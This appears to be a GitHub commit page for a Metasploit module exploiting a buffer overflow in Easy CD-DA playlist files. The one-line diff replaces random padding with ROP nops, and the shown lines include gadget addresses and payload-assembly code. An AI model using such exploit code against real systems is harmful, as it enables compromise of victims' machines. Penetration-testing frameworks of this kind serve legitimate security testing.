We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7195416 commit 3283880Copy full SHA for 3283880
modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -103,7 +103,7 @@ def exploit
103
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
104
].flatten.pack('V*')
105
106
- sploit = rand_text_alpha_upper(target['Offset'])
+ sploit = rop_nops(target['Offset'] / 4)
107
sploit << [target.ret].pack("V")
108
sploit << rop_nops(22)
109
sploit << rop_gadgets
0 commit comments